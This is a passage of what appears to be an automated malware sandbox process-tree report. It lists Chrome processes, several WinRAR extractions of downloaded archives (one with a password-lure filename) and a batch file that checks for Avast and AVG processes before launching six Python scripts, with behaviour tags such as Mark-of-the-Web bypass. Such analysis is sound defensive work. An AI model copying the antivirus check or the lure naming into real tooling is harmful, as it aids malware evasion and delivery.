  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=6592,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5260 /prefetch:1
  2⤵
  PID:1256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=6684,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6640 /prefetch:1
  2⤵
  PID:3308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6364,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6648 /prefetch:1
  2⤵
  PID:2584
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=4516,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4852 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=4420,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5996 /prefetch:1
  2⤵
  PID:4988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=3108,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5144 /prefetch:1
  2⤵
  PID:2744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=4424,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6096 /prefetch:1
  2⤵
  PID:1564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=6780,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6796 /prefetch:1
  2⤵
  PID:1984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=7036,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6916 /prefetch:1
  2⤵
  PID:2688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --field-trial-handle=4852,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7164 /prefetch:1
  2⤵
  PID:4396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --field-trial-handle=7132,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7300 /prefetch:1
  2⤵
  PID:3668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --field-trial-handle=4848,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7156 /prefetch:1
  2⤵
  PID:4192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --field-trial-handle=5244,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2972 /prefetch:1
  2⤵
  PID:5052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --field-trial-handle=7224,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7228 /prefetch:1
  2⤵
  PID:3856
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --field-trial-handle=6764,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7248 /prefetch:1
  2⤵
  PID:3188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --field-trial-handle=6568,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7040 /prefetch:1
  2⤵
  PID:3332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7160,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7352 /prefetch:8
  2⤵
  PID:712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=7024,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7172 /prefetch:8
  2⤵
  PID:768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --field-trial-handle=4456,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7348 /prefetch:1
  2⤵
  PID:3716
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --field-trial-handle=6248,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4764 /prefetch:1
  2⤵
  PID:2556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7140,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6988 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:1032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --field-trial-handle=5184,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6924 /prefetch:1
  2⤵
  PID:4824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --field-trial-handle=7348,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6960 /prefetch:1
  2⤵
  PID:4192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=6620,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4692 /prefetch:1
  2⤵
  PID:1012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --field-trial-handle=6944,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7152 /prefetch:1
  2⤵
  PID:972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --field-trial-handle=6180,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6488 /prefetch:1
  2⤵
  PID:2108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7040,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4396 /prefetch:8
  2⤵
  - NTFS ADS
  PID:200
- C:\Program Files\WinRAR\WinRAR.exe
  "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\sslipblacklist.tar.gz"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: GetForegroundWindowSpam
  PID:4712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --field-trial-handle=4788,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6332 /prefetch:1
  2⤵
  PID:2352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --field-trial-handle=7444,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7404 /prefetch:1
  2⤵
  PID:2156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6964,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6800 /prefetch:8
  2⤵
  - NTFS ADS
  PID:1776
- C:\Program Files\WinRAR\WinRAR.exe
  "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\113290aaa5c0b0793d50de6819f2b2eead5e321e9300d91b9a36d62ba8e5bbc1.zip"
  2⤵
  - Executes dropped EXE
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: GetForegroundWindowSpam
  PID:4680
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6400,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2664 /prefetch:8
  2⤵
  - NTFS ADS
  PID:3424
- C:\Program Files\WinRAR\WinRAR.exe
  "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\b0c71e2b19b3cde4f32ccf2159ab94beca188ffab5d761f2d610989821c772c3.zip"
  2⤵
  - Executes dropped EXE
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: GetForegroundWindowSpam
  PID:4000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --field-trial-handle=4692,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6900 /prefetch:1
  2⤵
  PID:4468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --field-trial-handle=7608,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5404 /prefetch:1
  2⤵
  PID:3356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --field-trial-handle=4760,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6176 /prefetch:1
  2⤵
  PID:3972
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --field-trial-handle=7592,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7560 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --field-trial-handle=4628,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5436 /prefetch:1
  2⤵
  PID:4180
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --field-trial-handle=2704,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4320 /prefetch:1
  2⤵
  PID:2176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --field-trial-handle=7632,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2972 /prefetch:1
  2⤵
  PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --field-trial-handle=7628,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1404 /prefetch:1
  2⤵
  PID:340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --field-trial-handle=7288,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6976 /prefetch:1
  2⤵
  PID:4724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --field-trial-handle=2968,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:1
  2⤵
  PID:4900
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --field-trial-handle=6428,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2664 /prefetch:1
  2⤵
  PID:5096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --field-trial-handle=7648,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6796 /prefetch:1
  2⤵
  PID:4328
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --field-trial-handle=6448,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4404 /prefetch:1
  2⤵
  PID:4156
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --field-trial-handle=4412,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6300 /prefetch:1
  2⤵
  PID:4904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --field-trial-handle=7052,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4680 /prefetch:1
  2⤵
  PID:728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --field-trial-handle=6444,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7016 /prefetch:1
  2⤵
  PID:2488
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --field-trial-handle=6164,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7356 /prefetch:1
  2⤵
  PID:2808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --field-trial-handle=7564,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4596 /prefetch:1
  2⤵
  PID:2988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --field-trial-handle=7280,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7580 /prefetch:1
  2⤵
  PID:3668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --field-trial-handle=7396,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6880 /prefetch:1
  2⤵
  PID:1304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --field-trial-handle=7228,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:1
  2⤵
  PID:3884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6652,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4432 /prefetch:8
  2⤵
  PID:5108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6644,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6820 /prefetch:8
  2⤵
  - NTFS ADS
  PID:4992
- C:\Program Files\WinRAR\WinRAR.exe
  "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\1736950955__«FîleReady▬PassWord▬Is☼◄151422►».zip"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  PID:3320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --field-trial-handle=7756,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7704 /prefetch:1
  2⤵
  PID:2688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --field-trial-handle=7744,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4696 /prefetch:1
  2⤵
  PID:580
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=7704,i,1374013108993884063,13395917052134188984,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7724 /prefetch:8
  2⤵
  PID:2604
- C:\Program Files\WinRAR\WinRAR.exe
  "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\1736950955__«FîleReady▬PassWord▬Is☼◄151422►».zip"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  PID:1500

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:248

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\a974ec99d2e7ac298007b066163c97032a9a2e1e9b8531ba327c9e65734cf474.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:3148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\a974ec99d2e7ac298007b066163c97032a9a2e1e9b8531ba327c9e65734cf474.bat" "
1⤵
PID:2600
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\Desktop\a974ec99d2e7ac298007b066163c97032a9a2e1e9b8531ba327c9e65734cf474.bat" MY_FLAG
  2⤵
  PID:248
- - C:\Windows\system32\tasklist.exe
    tasklist /FI "IMAGENAME eq AvastUI.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:5068
- - C:\Windows\system32\find.exe
    find /i "AvastUI.exe"
    3⤵
    PID:4796
- - C:\Windows\system32\tasklist.exe
    tasklist /FI "IMAGENAME eq avgui.exe"
    3⤵
    - Enumerates processes with tasklist
    PID:3372
- - C:\Windows\system32\find.exe
    find /i "avgui.exe"
    3⤵
    PID:684
- - C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
    python.exe ykyv1.py
    3⤵
    PID:4576
- - C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
    python.exe ykyv2.py
    3⤵
    PID:1732
- - C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
    python.exe ykyv3.py
    3⤵
    PID:2096
- - C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
    python.exe ykyv4.py
    3⤵
    PID:2920
- - C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
    python.exe ykyv5.py
    3⤵
    PID:1064
- - C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.42251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe
    python.exe ykyv6.py
    3⤵
    PID:1724

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4156

C:\Windows\helppane.exe
C:\Windows\helppane.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:4088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://go.microsoft.com/fwlink/?LinkId=517009
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of SendNotifyMessage
  PID:2600
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
